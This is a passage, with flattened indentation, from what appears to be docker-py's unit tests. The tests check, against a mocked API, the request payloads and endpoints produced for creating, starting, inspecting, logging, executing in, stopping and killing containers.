ports=[1111, (2222, 'udp'), (3333,)])
args = fake_request.call_args
self.assertEqual(args[0][1],
url_prefix + 'containers/create')
self.assertEqual(json.loads(args[1]['data']),
json.loads('''
{"Tty": false, "Image": "busybox",
"Cmd": ["ls"], "AttachStdin": false,
"ExposedPorts": {
"1111/tcp": {},
"2222/udp": {},
"3333/tcp": {}
},
"AttachStderr": true,
"AttachStdout": true, "OpenStdin": false,
"StdinOnce": false,
"NetworkDisabled": false}'''))
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
def test_create_container_with_entrypoint(self):
self.client.create_container('busybox', 'hello',
entrypoint='cowsay entry')
args = fake_request.call_args
self.assertEqual(args[0][1],
url_prefix + 'containers/create')
self.assertEqual(json.loads(args[1]['data']),
json.loads('''
{"Tty": false, "Image": "busybox",
"Cmd": ["hello"], "AttachStdin": false,
"AttachStderr": true,
"AttachStdout": true, "OpenStdin": false,
"StdinOnce": false,
"NetworkDisabled": false,
"Entrypoint": ["cowsay", "entry"]}'''))
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
def test_create_container_with_cpu_shares(self):
self.client.create_container('busybox', 'ls',
cpu_shares=5)
args = fake_request.call_args
self.assertEqual(args[0][1],
url_prefix + 'containers/create')
self.assertEqual(json.loads(args[1]['data']),
json.loads('''
{"Tty": false, "Image": "busybox",
"Cmd": ["ls"], "AttachStdin": false,
"AttachStderr": true,
"AttachStdout": true, "OpenStdin": false,
"StdinOnce": false,
"NetworkDisabled": false,
"CpuShares": 5}'''))
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
def test_create_container_with_cpuset(self):
self.client.create_container('busybox', 'ls',
cpuset='0,1')
args = fake_request.call_args
self.assertEqual(args[0][1],
url_prefix + 'containers/create')
self.assertEqual(json.loads(args[1]['data']),
json.loads('''
{"Tty": false, "Image": "busybox",
"Cmd": ["ls"], "AttachStdin": false,
"AttachStderr": true,
"AttachStdout": true, "OpenStdin": false,
"StdinOnce": false,
"NetworkDisabled": false,
"Cpuset": "0,1",
"CpusetCpus": "0,1"}'''))
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
def test_create_container_with_cgroup_parent(self):
self.client.create_container(
'busybox', 'ls', host_config=self.client.create_host_config(
cgroup_parent='test'
)
)
args = fake_request.call_args
self.assertEqual(args[0][1],
url_prefix + 'containers/create')
data = json.loads(args[1]['data'])
self.assertIn('HostConfig', data)
self.assertIn('CgroupParent', data['HostConfig'])
self.assertEqual(data['HostConfig']['CgroupParent'], 'test')
def test_create_container_with_working_dir(self):
self.client.create_container('busybox', 'ls',
working_dir='/root')
args = fake_request.call_args
self.assertEqual(args[0][1],
url_prefix + 'containers/create')
self.assertEqual(json.loads(args[1]['data']),
json.loads('''
{"Tty": false, "Image": "busybox",
"Cmd": ["ls"], "AttachStdin": false,
"AttachStderr": true,
"AttachStdout": true, "OpenStdin": false,
"StdinOnce": false,
"NetworkDisabled": false,
"WorkingDir": "/root"}'''))
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
def test_create_container_with_stdin_open(self):
self.client.create_container('busybox', 'true', stdin_open=True)
args = fake_request.call_args
self.assertEqual(args[0][1],
url_prefix + 'containers/create')
self.assertEqual(json.loads(args[1]['data']),
json.loads('''
{"Tty": false, "Image": "busybox", "Cmd": ["true"],
"AttachStdin": true,
"AttachStderr": true, "AttachStdout": true,
"StdinOnce": true,
"OpenStdin": true, "NetworkDisabled": false}'''))
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
def test_create_container_with_volumes_from(self):
vol_names = ['foo', 'bar']
try:
self.client.create_container('busybox', 'true',
volumes_from=vol_names)
except docker.errors.DockerException:
self.assertTrue(
docker.utils.compare_version('1.10', self.client._version) >= 0
)
return
args = fake_request.call_args
self.assertEqual(args[0][1], url_prefix + 'containers/create')
self.assertEqual(json.loads(args[1]['data'])['VolumesFrom'],
','.join(vol_names))
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
def test_create_container_empty_volumes_from(self):
self.client.create_container('busybox', 'true', volumes_from=[])
args = fake_request.call_args
data = json.loads(args[1]['data'])
self.assertTrue('VolumesFrom' not in data)
def test_create_named_container(self):
self.client.create_container('busybox', 'true',
name='marisa-kirisame')
args = fake_request.call_args
self.assertEqual(args[0][1],
url_prefix + 'containers/create')
self.assertEqual(json.loads(args[1]['data']),
json.loads('''
{"Tty": false, "Image": "busybox", "Cmd": ["true"],
"AttachStdin": false,
"AttachStderr": true, "AttachStdout": true,
"StdinOnce": false,
"OpenStdin": false, "NetworkDisabled": false}'''))
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
self.assertEqual(args[1]['params'], {'name': 'marisa-kirisame'})
def test_create_container_with_mem_limit_as_int(self):
self.client.create_container(
'busybox', 'true', host_config=self.client.create_host_config(
mem_limit=128.0
)
)
args = fake_request.call_args
data = json.loads(args[1]['data'])
self.assertEqual(data['HostConfig']['Memory'], 128.0)
def test_create_container_with_mem_limit_as_string(self):
self.client.create_container(
'busybox', 'true', host_config=self.client.create_host_config(
mem_limit='128'
)
)
args = fake_request.call_args
data = json.loads(args[1]['data'])
self.assertEqual(data['HostConfig']['Memory'], 128.0)
def test_create_container_with_mem_limit_as_string_with_k_unit(self):
self.client.create_container(
'busybox', 'true', host_config=self.client.create_host_config(
mem_limit='128k'
)
)
args = fake_request.call_args
data = json.loads(args[1]['data'])
self.assertEqual(data['HostConfig']['Memory'], 128.0 * 1024)
def test_create_container_with_mem_limit_as_string_with_m_unit(self):
self.client.create_container(
'busybox', 'true', host_config=self.client.create_host_config(
mem_limit='128m'
)
)
args = fake_request.call_args
data = json.loads(args[1]['data'])
self.assertEqual(data['HostConfig']['Memory'], 128.0 * 1024 * 1024)
def test_create_container_with_mem_limit_as_string_with_g_unit(self):
self.client.create_container(
'busybox', 'true', host_config=self.client.create_host_config(
mem_limit='128g'
)
)
args = fake_request.call_args
data = json.loads(args[1]['data'])
self.assertEqual(
data['HostConfig']['Memory'], 128.0 * 1024 * 1024 * 1024
)
def test_create_container_with_mem_limit_as_string_with_wrong_value(self):
self.assertRaises(
docker.errors.DockerException,
self.client.create_host_config, mem_limit='128p'
)
self.assertRaises(
docker.errors.DockerException,
self.client.create_host_config, mem_limit='1f28'
)
def test_start_container(self):
self.client.start(fake_api.FAKE_CONTAINER_ID)
args = fake_request.call_args
self.assertEqual(
args[0][1],
url_prefix + 'containers/3cc2351ab11b/start'
)
self.assertEqual(json.loads(args[1]['data']), {})
self.assertEqual(
args[1]['headers'], {'Content-Type': 'application/json'}
)
self.assertEqual(
args[1]['timeout'], DEFAULT_TIMEOUT_SECONDS
)
def test_start_container_none(self):
with pytest.raises(ValueError) as excinfo:
self.client.start(container=None)
self.assertEqual(
str(excinfo.value),
'image or container param is undefined',
)
with pytest.raises(ValueError) as excinfo:
self.client.start(None)
self.assertEqual(
str(excinfo.value),
'image or container param is undefined',
)
def test_start_container_regression_573(self):
self.client.start(**{'container': fake_api.FAKE_CONTAINER_ID})
def test_create_container_with_lxc_conf(self):
self.client.create_container(
'busybox', 'true', host_config=self.client.create_host_config(
lxc_conf={'lxc.conf.k': 'lxc.conf.value'}
)
)
args = fake_request.call_args
self.assertEqual(
args[0][1],
url_prefix + 'containers/create'
)
expected_payload = self.base_create_payload()
expected_payload['HostConfig'] = self.client.create_host_config()
expected_payload['HostConfig']['LxcConf'] = [
{"Value": "lxc.conf.value", "Key": "lxc.conf.k"}
]
self.assertEqual(json.loads(args[1]['data']), expected_payload)
self.assertEqual(
args[1]['headers'],
{'Content-Type': 'application/json'}
)
self.assertEqual(
args[1]['timeout'],
DEFAULT_TIMEOUT_SECONDS
)
def test_create_container_with_lxc_conf_compat(self):
self.client.create_container(
'busybox', 'true', host_config=self.client.create_host_config(
lxc_conf=[{'Key': 'lxc.conf.k', 'Value': 'lxc.conf.value'}]
)
)
args = fake_request.call_args
self.assertEqual(args[0][1], url_prefix + 'containers/create')
expected_payload = self.base_create_payload()
expected_payload['HostConfig'] = self.client.create_host_config()
expected_payload['HostConfig']['LxcConf'] = [
{"Value": "lxc.conf.value", "Key": "lxc.conf.k"}
]
self.assertEqual(
json.loads(args[1]['data']), expected_payload)
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
self.assertEqual(
args[1]['timeout'],
DEFAULT_TIMEOUT_SECONDS
)
def test_create_container_with_binds_ro(self):
mount_dest = '/mnt'
mount_origin = '/tmp'
self.client.create_container(
'busybox', 'true', host_config=self.client.create_host_config(
binds={mount_origin: {
"bind": mount_dest,
"ro": True
}}
)
)
args = fake_request.call_args
self.assertEqual(args[0][1], url_prefix +
'containers/create')
expected_payload = self.base_create_payload()
expected_payload['HostConfig'] = self.client.create_host_config()
expected_payload['HostConfig']['Binds'] = ["/tmp:/mnt:ro"]
self.assertEqual(json.loads(args[1]['data']), expected_payload)
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
self.assertEqual(
args[1]['timeout'],
DEFAULT_TIMEOUT_SECONDS
)
def test_create_container_with_binds_rw(self):
mount_dest = '/mnt'
mount_origin = '/tmp'
self.client.create_container(
'busybox', 'true', host_config=self.client.create_host_config(
binds={mount_origin: {
"bind": mount_dest,
"ro": False
}}
)
)
args = fake_request.call_args
self.assertEqual(args[0][1], url_prefix +
'containers/create')
expected_payload = self.base_create_payload()
expected_payload['HostConfig'] = self.client.create_host_config()
expected_payload['HostConfig']['Binds'] = ["/tmp:/mnt:rw"]
self.assertEqual(json.loads(args[1]['data']), expected_payload)
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
self.assertEqual(
args[1]['timeout'],
DEFAULT_TIMEOUT_SECONDS
)
def test_create_container_with_binds_mode(self):
mount_dest = '/mnt'
mount_origin = '/tmp'
self.client.create_container(
'busybox', 'true', host_config=self.client.create_host_config(
binds={mount_origin: {
"bind": mount_dest,
"mode": "z",
}}
)
)
args = fake_request.call_args
self.assertEqual(args[0][1], url_prefix +
'containers/create')
expected_payload = self.base_create_payload()
expected_payload['HostConfig'] = self.client.create_host_config()
expected_payload['HostConfig']['Binds'] = ["/tmp:/mnt:z"]
self.assertEqual(json.loads(args[1]['data']), expected_payload)
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
self.assertEqual(
args[1]['timeout'],
DEFAULT_TIMEOUT_SECONDS
)
def test_create_container_with_binds_mode_and_ro_error(self):
with pytest.raises(ValueError):
mount_dest = '/mnt'
mount_origin = '/tmp'
self.client.create_container(
'busybox', 'true', host_config=self.client.create_host_config(
binds={mount_origin: {
"bind": mount_dest,
"mode": "z",
"ro": True,
}}
)
)
def test_create_container_with_binds_list(self):
self.client.create_container(
'busybox', 'true', host_config=self.client.create_host_config(
binds=[
"/tmp:/mnt/1:ro",
"/tmp:/mnt/2",
],
)
)
args = fake_request.call_args
self.assertEqual(args[0][1], url_prefix +
'containers/create')
expected_payload = self.base_create_payload()
expected_payload['HostConfig'] = self.client.create_host_config()
expected_payload['HostConfig']['Binds'] = [
"/tmp:/mnt/1:ro",
"/tmp:/mnt/2",
]
self.assertEqual(json.loads(args[1]['data']), expected_payload)
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
self.assertEqual(
args[1]['timeout'],
DEFAULT_TIMEOUT_SECONDS
)
def test_create_container_with_port_binds(self):
self.maxDiff = None
self.client.create_container(
'busybox', 'true', host_config=self.client.create_host_config(
port_bindings={
1111: None,
2222: 2222,
'3333/udp': (3333,),
4444: ('127.0.0.1',),
5555: ('127.0.0.1', 5555),
6666: [('127.0.0.1',), ('192.168.0.1',)]
}
)
)
args = fake_request.call_args
self.assertEqual(args[0][1], url_prefix + 'containers/create')
data = json.loads(args[1]['data'])
port_bindings = data['HostConfig']['PortBindings']
self.assertTrue('1111/tcp' in port_bindings)
self.assertTrue('2222/tcp' in port_bindings)
self.assertTrue('3333/udp' in port_bindings)
self.assertTrue('4444/tcp' in port_bindings)
self.assertTrue('5555/tcp' in port_bindings)
self.assertTrue('6666/tcp' in port_bindings)
self.assertEqual(
[{"HostPort": "", "HostIp": ""}],
port_bindings['1111/tcp']
)
self.assertEqual(
[{"HostPort": "2222", "HostIp": ""}],
port_bindings['2222/tcp']
)
self.assertEqual(
[{"HostPort": "3333", "HostIp": ""}],
port_bindings['3333/udp']
)
self.assertEqual(
[{"HostPort": "", "HostIp": "127.0.0.1"}],
port_bindings['4444/tcp']
)
self.assertEqual(
[{"HostPort": "5555", "HostIp": "127.0.0.1"}],
port_bindings['5555/tcp']
)
self.assertEqual(len(port_bindings['6666/tcp']), 2)
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
self.assertEqual(
args[1]['timeout'],
DEFAULT_TIMEOUT_SECONDS
)
def test_create_container_with_mac_address(self):
mac_address_expected = "02:42:ac:11:00:0a"
container = self.client.create_container(
'busybox', ['sleep', '60'], mac_address=mac_address_expected)
res = self.client.inspect_container(container['Id'])
self.assertEqual(mac_address_expected,
res['NetworkSettings']['MacAddress'])
def test_create_container_with_links(self):
link_path = 'path'
alias = 'alias'
self.client.create_container(
'busybox', 'true', host_config=self.client.create_host_config(
links={link_path: alias}
)
)
args = fake_request.call_args
self.assertEqual(
args[0][1], url_prefix + 'containers/create'
)
expected_payload = self.base_create_payload()
expected_payload['HostConfig'] = self.client.create_host_config()
expected_payload['HostConfig']['Links'] = ['path:alias']
self.assertEqual(json.loads(args[1]['data']), expected_payload)
self.assertEqual(
args[1]['headers'], {'Content-Type': 'application/json'}
)
def test_create_container_with_multiple_links(self):
link_path = 'path'
alias = 'alias'
self.client.create_container(
'busybox', 'true', host_config=self.client.create_host_config(
links={
link_path + '1': alias + '1',
link_path + '2': alias + '2'
}
)
)
args = fake_request.call_args
self.assertEqual(args[0][1], url_prefix + 'containers/create')
expected_payload = self.base_create_payload()
expected_payload['HostConfig'] = self.client.create_host_config()
expected_payload['HostConfig']['Links'] = [
'path1:alias1', 'path2:alias2'
]
self.assertEqual(json.loads(args[1]['data']), expected_payload)
self.assertEqual(
args[1]['headers'], {'Content-Type': 'application/json'}
)
def test_create_container_with_links_as_list_of_tuples(self):
link_path = 'path'
alias = 'alias'
self.client.create_container(
'busybox', 'true', host_config=self.client.create_host_config(
links=[(link_path, alias)]
)
)
args = fake_request.call_args
self.assertEqual(args[0][1], url_prefix + 'containers/create')
expected_payload = self.base_create_payload()
expected_payload['HostConfig'] = self.client.create_host_config()
expected_payload['HostConfig']['Links'] = ['path:alias']
self.assertEqual(json.loads(args[1]['data']), expected_payload)
self.assertEqual(
args[1]['headers'], {'Content-Type': 'application/json'}
)
def test_create_container_privileged(self):
self.client.create_container(
'busybox', 'true',
host_config=self.client.create_host_config(privileged=True)
)
expected_payload = self.base_create_payload()
expected_payload['HostConfig'] = self.client.create_host_config()
expected_payload['HostConfig']['Privileged'] = True
args = fake_request.call_args
self.assertEqual(args[0][1], url_prefix + 'containers/create')
self.assertEqual(json.loads(args[1]['data']), expected_payload)
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
self.assertEqual(
args[1]['timeout'],
DEFAULT_TIMEOUT_SECONDS
)
def test_start_container_with_lxc_conf(self):
def call_start():
self.client.start(
fake_api.FAKE_CONTAINER_ID,
lxc_conf={'lxc.conf.k': 'lxc.conf.value'}
)
pytest.deprecated_call(call_start)
def test_start_container_with_lxc_conf_compat(self):
def call_start():
self.client.start(
fake_api.FAKE_CONTAINER_ID,
lxc_conf=[{'Key': 'lxc.conf.k', 'Value': 'lxc.conf.value'}]
)
pytest.deprecated_call(call_start)
def test_start_container_with_binds_ro(self):
def call_start():
self.client.start(
fake_api.FAKE_CONTAINER_ID, binds={
'/tmp': {
"bind": '/mnt',
"ro": True
}
}
)
pytest.deprecated_call(call_start)
def test_start_container_with_binds_rw(self):
def call_start():
self.client.start(
fake_api.FAKE_CONTAINER_ID, binds={
'/tmp': {"bind": '/mnt', "ro": False}
}
)
pytest.deprecated_call(call_start)
def test_start_container_with_port_binds(self):
self.maxDiff = None
def call_start():
self.client.start(fake_api.FAKE_CONTAINER_ID, port_bindings={
1111: None,
2222: 2222,
'3333/udp': (3333,),
4444: ('127.0.0.1',),
5555: ('127.0.0.1', 5555),
6666: [('127.0.0.1',), ('192.168.0.1',)]
})
pytest.deprecated_call(call_start)
def test_start_container_with_links(self):
def call_start():
self.client.start(
fake_api.FAKE_CONTAINER_ID, links={'path': 'alias'}
)
pytest.deprecated_call(call_start)
def test_start_container_with_multiple_links(self):
def call_start():
self.client.start(
fake_api.FAKE_CONTAINER_ID,
links={
'path1': 'alias1',
'path2': 'alias2'
}
)
pytest.deprecated_call(call_start)
def test_start_container_with_links_as_list_of_tuples(self):
def call_start():
self.client.start(fake_api.FAKE_CONTAINER_ID,
links=[('path', 'alias')])
pytest.deprecated_call(call_start)
def test_start_container_privileged(self):
def call_start():
self.client.start(fake_api.FAKE_CONTAINER_ID, privileged=True)
pytest.deprecated_call(call_start)
def test_start_container_with_dict_instead_of_id(self):
self.client.start({'Id': fake_api.FAKE_CONTAINER_ID})
args = fake_request.call_args
self.assertEqual(
args[0][1],
url_prefix + 'containers/3cc2351ab11b/start'
)
self.assertEqual(json.loads(args[1]['data']), {})
self.assertEqual(
args[1]['headers'], {'Content-Type': 'application/json'}
)
self.assertEqual(
args[1]['timeout'], DEFAULT_TIMEOUT_SECONDS
)
def test_create_container_with_restart_policy(self):
self.client.create_container(
'busybox', 'true', host_config=self.client.create_host_config(
restart_policy={
"Name": "always",
"MaximumRetryCount": 0
}
)
)
args = fake_request.call_args
self.assertEqual(args[0][1], url_prefix + 'containers/create')
expected_payload = self.base_create_payload()
expected_payload['HostConfig'] = self.client.create_host_config()
expected_payload['HostConfig']['RestartPolicy'] = {
"MaximumRetryCount": 0, "Name": "always"
}
self.assertEqual(json.loads(args[1]['data']), expected_payload)
self.assertEqual(
args[1]['headers'], {'Content-Type': 'application/json'}
)
self.assertEqual(
args[1]['timeout'], DEFAULT_TIMEOUT_SECONDS
)
def test_create_container_with_added_capabilities(self):
self.client.create_container(
'busybox', 'true',
host_config=self.client.create_host_config(cap_add=['MKNOD'])
)
args = fake_request.call_args
self.assertEqual(args[0][1], url_prefix + 'containers/create')
expected_payload = self.base_create_payload()
expected_payload['HostConfig'] = self.client.create_host_config()
expected_payload['HostConfig']['CapAdd'] = ['MKNOD']
self.assertEqual(json.loads(args[1]['data']), expected_payload)
self.assertEqual(
args[1]['headers'], {'Content-Type': 'application/json'}
)
self.assertEqual(
args[1]['timeout'], DEFAULT_TIMEOUT_SECONDS
)
def test_create_container_with_dropped_capabilities(self):
self.client.create_container(
'busybox', 'true',
host_config=self.client.create_host_config(cap_drop=['MKNOD'])
)
args = fake_request.call_args
self.assertEqual(args[0][1], url_prefix + 'containers/create')
expected_payload = self.base_create_payload()
expected_payload['HostConfig'] = self.client.create_host_config()
expected_payload['HostConfig']['CapDrop'] = ['MKNOD']
self.assertEqual(json.loads(args[1]['data']), expected_payload)
self.assertEqual(
args[1]['headers'], {'Content-Type': 'application/json'}
)
self.assertEqual(
args[1]['timeout'], DEFAULT_TIMEOUT_SECONDS
)
def test_create_container_with_devices(self):
self.client.create_container(
'busybox', 'true', host_config=self.client.create_host_config(
devices=['/dev/sda:/dev/xvda:rwm',
'/dev/sdb:/dev/xvdb',
'/dev/sdc']
)
)
args = fake_request.call_args
self.assertEqual(args[0][1], url_prefix + 'containers/create')
expected_payload = self.base_create_payload()
expected_payload['HostConfig'] = self.client.create_host_config()
expected_payload['HostConfig']['Devices'] = [
{'CgroupPermissions': 'rwm',
'PathInContainer': '/dev/xvda',
'PathOnHost': '/dev/sda'},
{'CgroupPermissions': 'rwm',
'PathInContainer': '/dev/xvdb',
'PathOnHost': '/dev/sdb'},
{'CgroupPermissions': 'rwm',
'PathInContainer': '/dev/sdc',
'PathOnHost': '/dev/sdc'}
]
self.assertEqual(json.loads(args[1]['data']), expected_payload)
self.assertEqual(
args[1]['headers'], {'Content-Type': 'application/json'}
)
self.assertEqual(
args[1]['timeout'], DEFAULT_TIMEOUT_SECONDS
)
def test_create_container_with_labels_dict(self):
labels_dict = {
six.text_type('foo'): six.text_type('1'),
six.text_type('bar'): six.text_type('2'),
}
self.client.create_container(
'busybox', 'true',
labels=labels_dict,
)
args = fake_request.call_args
self.assertEqual(args[0][1], url_prefix + 'containers/create')
self.assertEqual(json.loads(args[1]['data'])['Labels'], labels_dict)
self.assertEqual(
args[1]['headers'], {'Content-Type': 'application/json'}
)
self.assertEqual(
args[1]['timeout'], DEFAULT_TIMEOUT_SECONDS
)
def test_create_container_with_labels_list(self):
labels_list = [
six.text_type('foo'),
six.text_type('bar'),
]
labels_dict = {
six.text_type('foo'): six.text_type(),
six.text_type('bar'): six.text_type(),
}
self.client.create_container(
'busybox', 'true',
labels=labels_list,
)
args = fake_request.call_args
self.assertEqual(args[0][1], url_prefix + 'containers/create')
self.assertEqual(json.loads(args[1]['data'])['Labels'], labels_dict)
self.assertEqual(
args[1]['headers'], {'Content-Type': 'application/json'}
)
self.assertEqual(
args[1]['timeout'], DEFAULT_TIMEOUT_SECONDS
)
def test_create_container_with_named_volume(self):
mount_dest = '/mnt'
volume_name = 'name'
self.client.create_container(
'busybox', 'true',
host_config=self.client.create_host_config(
binds={volume_name: {
"bind": mount_dest,
"ro": False
}}),
volume_driver='foodriver',
)
args = fake_request.call_args
self.assertEqual(
args[0][1], url_prefix + 'containers/create'
)
expected_payload = self.base_create_payload()
expected_payload['VolumeDriver'] = 'foodriver'
expected_payload['HostConfig'] = self.client.create_host_config()
expected_payload['HostConfig']['Binds'] = ["name:/mnt:rw"]
self.assertEqual(json.loads(args[1]['data']), expected_payload)
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
self.assertEqual(
args[1]['timeout'],
DEFAULT_TIMEOUT_SECONDS
)
def test_resize_container(self):
self.client.resize(
{'Id': fake_api.FAKE_CONTAINER_ID},
height=15,
width=120
)
fake_request.assert_called_with(
'POST',
url_prefix + 'containers/3cc2351ab11b/resize',
params={'h': 15, 'w': 120},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_rename_container(self):
self.client.rename(
{'Id': fake_api.FAKE_CONTAINER_ID},
name='foobar'
)
fake_request.assert_called_with(
'POST',
url_prefix + 'containers/3cc2351ab11b/rename',
params={'name': 'foobar'},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_wait(self):
self.client.wait(fake_api.FAKE_CONTAINER_ID)
fake_request.assert_called_with(
'POST',
url_prefix + 'containers/3cc2351ab11b/wait',
timeout=None
)
def test_wait_with_dict_instead_of_id(self):
self.client.wait({'Id': fake_api.FAKE_CONTAINER_ID})
fake_request.assert_called_with(
'POST',
url_prefix + 'containers/3cc2351ab11b/wait',
timeout=None
)
def _socket_path_for_client_session(self, client):
socket_adapter = client.get_adapter('http+docker://')
return socket_adapter.socket_path
def test_url_compatibility_unix(self):
c = docker.Client(base_url="unix://socket")
assert self._socket_path_for_client_session(c) == '/socket'
def test_url_compatibility_unix_triple_slash(self):
c = docker.Client(base_url="unix:///socket")
assert self._socket_path_for_client_session(c) == '/socket'
def test_url_compatibility_http_unix_triple_slash(self):
c = docker.Client(base_url="http+unix:///socket")
assert self._socket_path_for_client_session(c) == '/socket'
def test_url_compatibility_http(self):
c = docker.Client(base_url="http://hostname:1234")
assert c.base_url == "http://hostname:1234"
def test_url_compatibility_tcp(self):
c = docker.Client(base_url="tcp://hostname:1234")
assert c.base_url == "http://hostname:1234"
def test_logs(self):
with mock.patch('docker.Client.inspect_container',
fake_inspect_container):
logs = self.client.logs(fake_api.FAKE_CONTAINER_ID)
fake_request.assert_called_with(
'GET',
url_prefix + 'containers/3cc2351ab11b/logs',
params={'timestamps': 0, 'follow': 0, 'stderr': 1, 'stdout': 1,
'tail': 'all'},
timeout=DEFAULT_TIMEOUT_SECONDS,
stream=False
)
self.assertEqual(
logs,
'Flowering Nights\n(Sakuya Iyazoi)\n'.encode('ascii')
)
def test_logs_with_dict_instead_of_id(self):
with mock.patch('docker.Client.inspect_container',
fake_inspect_container):
logs = self.client.logs({'Id': fake_api.FAKE_CONTAINER_ID})
fake_request.assert_called_with(
'GET',
url_prefix + 'containers/3cc2351ab11b/logs',
params={'timestamps': 0, 'follow': 0, 'stderr': 1, 'stdout': 1,
'tail': 'all'},
timeout=DEFAULT_TIMEOUT_SECONDS,
stream=False
)
self.assertEqual(
logs,
'Flowering Nights\n(Sakuya Iyazoi)\n'.encode('ascii')
)
def test_log_streaming(self):
with mock.patch('docker.Client.inspect_container',
fake_inspect_container):
self.client.logs(fake_api.FAKE_CONTAINER_ID, stream=True)
fake_request.assert_called_with(
'GET',
url_prefix + 'containers/3cc2351ab11b/logs',
params={'timestamps': 0, 'follow': 1, 'stderr': 1, 'stdout': 1,
'tail': 'all'},
timeout=DEFAULT_TIMEOUT_SECONDS,
stream=True
)
def test_log_tail(self):
with mock.patch('docker.Client.inspect_container',
fake_inspect_container):
self.client.logs(fake_api.FAKE_CONTAINER_ID, stream=False,
tail=10)
fake_request.assert_called_with(
'GET',
url_prefix + 'containers/3cc2351ab11b/logs',
params={'timestamps': 0, 'follow': 0, 'stderr': 1, 'stdout': 1,
'tail': 10},
timeout=DEFAULT_TIMEOUT_SECONDS,
stream=False
)
def test_log_tty(self):
m = mock.Mock()
with mock.patch('docker.Client.inspect_container',
fake_inspect_container_tty):
with mock.patch('docker.Client._stream_raw_result',
m):
self.client.logs(fake_api.FAKE_CONTAINER_ID,
stream=True)
self.assertTrue(m.called)
fake_request.assert_called_with(
'GET',
url_prefix + 'containers/3cc2351ab11b/logs',
params={'timestamps': 0, 'follow': 1, 'stderr': 1, 'stdout': 1,
'tail': 'all'},
timeout=DEFAULT_TIMEOUT_SECONDS,
stream=True
)
def test_diff(self):
self.client.diff(fake_api.FAKE_CONTAINER_ID)
fake_request.assert_called_with(
'GET',
url_prefix + 'containers/3cc2351ab11b/changes',
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_diff_with_dict_instead_of_id(self):
self.client.diff({'Id': fake_api.FAKE_CONTAINER_ID})
fake_request.assert_called_with(
'GET',
url_prefix + 'containers/3cc2351ab11b/changes',
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_port(self):
self.client.port({'Id': fake_api.FAKE_CONTAINER_ID}, 1111)
fake_request.assert_called_with(
'GET',
url_prefix + 'containers/3cc2351ab11b/json',
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_stop_container(self):
timeout = 2
self.client.stop(fake_api.FAKE_CONTAINER_ID, timeout=timeout)
fake_request.assert_called_with(
'POST',
url_prefix + 'containers/3cc2351ab11b/stop',
params={'t': timeout},
timeout=(DEFAULT_TIMEOUT_SECONDS + timeout)
)
def test_stop_container_with_dict_instead_of_id(self):
timeout = 2
self.client.stop({'Id': fake_api.FAKE_CONTAINER_ID},
timeout=timeout)
fake_request.assert_called_with(
'POST',
url_prefix + 'containers/3cc2351ab11b/stop',
params={'t': timeout},
timeout=(DEFAULT_TIMEOUT_SECONDS + timeout)
)
def test_exec_create(self):
self.client.exec_create(fake_api.FAKE_CONTAINER_ID, ['ls', '-1'])
args = fake_request.call_args
        self.assertEqual('POST', args[0][0])
        self.assertEqual(
            args[0][1], url_prefix + 'containers/{0}/exec'.format(
                fake_api.FAKE_CONTAINER_ID
            )
        )
self.assertEqual(
json.loads(args[1]['data']), {
'Tty': False,
'AttachStdout': True,
'Container': fake_api.FAKE_CONTAINER_ID,
'Cmd': ['ls', '-1'],
'Privileged': False,
'AttachStdin': False,
'AttachStderr': True,
'User': ''
}
)
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
def test_exec_start(self):
self.client.exec_start(fake_api.FAKE_EXEC_ID)
args = fake_request.call_args
self.assertEqual(
args[0][1], url_prefix + 'exec/{0}/start'.format(
fake_api.FAKE_EXEC_ID
)
)
self.assertEqual(
json.loads(args[1]['data']), {
'Tty': False,
'Detach': False,
}
)
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
def test_exec_inspect(self):
self.client.exec_inspect(fake_api.FAKE_EXEC_ID)
args = fake_request.call_args
self.assertEqual(
args[0][1], url_prefix + 'exec/{0}/json'.format(
fake_api.FAKE_EXEC_ID
)
)
def test_exec_resize(self):
self.client.exec_resize(fake_api.FAKE_EXEC_ID, height=20, width=60)
fake_request.assert_called_with(
'POST',
url_prefix + 'exec/{0}/resize'.format(fake_api.FAKE_EXEC_ID),
params={'h': 20, 'w': 60},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_pause_container(self):
self.client.pause(fake_api.FAKE_CONTAINER_ID)
fake_request.assert_called_with(
'POST',
url_prefix + 'containers/3cc2351ab11b/pause',
timeout=(DEFAULT_TIMEOUT_SECONDS)
)
def test_unpause_container(self):
self.client.unpause(fake_api.FAKE_CONTAINER_ID)
fake_request.assert_called_with(
'POST',
url_prefix + 'containers/3cc2351ab11b/unpause',
timeout=(DEFAULT_TIMEOUT_SECONDS)
)
def test_kill_container(self):
self.client.kill(fake_api.FAKE_CONTAINER_ID)
fake_request.assert_called_with(
'POST',
url_prefix + 'containers/3cc2351ab11b/kill',
params={},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_kill_container_with_dict_instead_of_id(self):
self.client.kill({'Id': fake_api.FAKE_CONTAINER_ID})
fake_request.assert_called_with(
'POST',
url_prefix + 'containers/3cc2351ab11b/kill',
params={},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_kill_container_with_signal(self):
self.client.kill(fake_api.FAKE_CONTAINER_ID, signal=signal.SIGTERM)
fake_request.assert_called_with(
'POST',
url_prefix + 'containers/3cc2351ab11b/kill',
params={'signal': signal.SIGTERM},
